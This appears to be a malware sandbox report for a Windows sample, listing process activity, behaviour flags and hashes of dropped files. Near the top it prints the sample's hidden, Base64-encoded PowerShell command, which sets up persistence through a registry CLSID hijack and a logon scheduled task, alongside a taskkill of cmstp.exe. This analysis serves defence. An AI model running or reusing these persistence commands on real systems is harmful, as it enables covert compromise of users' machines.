C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded UgBFAEcAIABBAGQAZAAgACIASABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAFwAQwBMAFMASQBEAFwAewA2ADQANQBGAEYAMAA0ADAALQA1ADAAOAAxAC0AMQAwADEAQgAtADkARgAwADgALQAwADAAQQBBADAAMAAyAEYAOQA1ADQARQB9AFwAcwBoAGUAbABsAFwAbwBwAGUAbgBcAGMAbwBtAG0AYQBuAGQAIgAgAC8AZgAgAC8AdgBlACAALwB0ACAAUgBFAEcAXwBTAFoAIAAvAGQAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACQAQQBjAHQAaQBvAG4AIAA9ACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQApADsAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBCAGEAYwBrAGcAcgBvAHUAbgBkAEMAaABlAGMAawAiACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACIASABpAGcAaABlAHMAdAAiACAALQBGAG8AcgBjAGUAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAG8AbgBpAGMAQgBhAHMAZQBiAGEAbgBkAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUA2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe3⤵
- Modifies registry class
PID:364
-
-
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1844
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
PID:4696
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
53KB
MD5bb7c45699212b8d044800fe3083e69eb
SHA1c7c2f2122674983ae23e51409abe2e4d26ac4823
SHA256960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf
SHA51278557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd
-
Filesize
15KB
MD53fc4824e0a712206096191f319e6d6a9
SHA1b546e0633e242d2bcb287a0d55baffb3d2e07f10
SHA2568c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b
SHA512404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49
-
Filesize
17KB
MD53111b8507c855bf0afb1b82a6ceb5a3b
SHA109336fa120984ba60e90b8098780de5bc52edae8
SHA2565b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace
SHA512171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36
-
Filesize
19KB
MD541df442e734dce300c0e13bef9a7da8a
SHA17593cd0d7c3f4e64d6049faeb04a5475b610a331
SHA256173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4
SHA512b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376
-
Filesize
1KB
MD5efb6f1e28f266bb33cb2b76be37cc491
SHA1f4cf1bafdccb11486ff7e5e877246e957cae90db
SHA256d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf
SHA512259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546
-
Filesize
1KB
MD5e3c3a4cd024da909b42bf03908660705
SHA1adb77c2454224fbbde4c497cbd9b293df83a35f7
SHA2566917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944
SHA512f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD566637d2c99c6e40bc6192f1efc4e0f2e
SHA19347c1d7d9bcaac204ca664577ae6381c1f74100
SHA25664d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b
SHA51215b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
257B
MD57067af414215ee4c50bfcd3ea43c84f0
SHA1c331d410672477844a4ca87f43a14e643c863af9
SHA2562050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12
SHA51217b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
103KB
MD58d9709ff7d9c83bd376e01912c734f0a
SHA1e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294
SHA25649a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
SHA512042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee
-
Filesize
103KB
MD58d9709ff7d9c83bd376e01912c734f0a
SHA1e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294
SHA25649a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
SHA512042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee
-
Filesize
677B
MD5c2fcdcd6299b04fbef530d7b144181d8
SHA143d8a39fb9a78b244b6740ac654be9fe84d32d31
SHA2564536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5
SHA5124335f0721aeceaf3ce8aa492aea2f66d8dc1930d2963395d7c13768cc0d772d9cf3bdda4e00ad2335d919dfc430022eb64bf6157c2811175844cebf1629917cb
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
652B
MD599098e74c736af4c6091d654bf437908
SHA1fbdd75270a2a3199c06d500f375ac8a93d017d61
SHA256736ab241ff665485982d66aca09acba8310e0a802564a4bf1b23b318d641f041
SHA512e853007e310ff3698686283628cb7a04b223468776ab622c0e4ad50e7cc722b7011de5fbd678ce32e356256e495133bcf8261e2807f82ca30e59fcc08d167308
-
Filesize
268B
MD57fbb3f2ac5a0040e7e42f8fc7cd6fbfe
SHA193fcde99bba753677f8786fbcdba4d695296bd12
SHA256d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2
SHA5123fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8
-
Filesize
369B
MD529a3f8c092a3b0faa5b6d042e1c978b0
SHA1ed601829698514b97f8d9a4f70ace829f9478fb3
SHA25655333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3
SHA512a948e44aec0a83aadfea494a52710c444b02f607e3238a7415526d000d70392fe91777059f3b94f29ec995b9be44a33158281068985cf0076134a4927c8991fa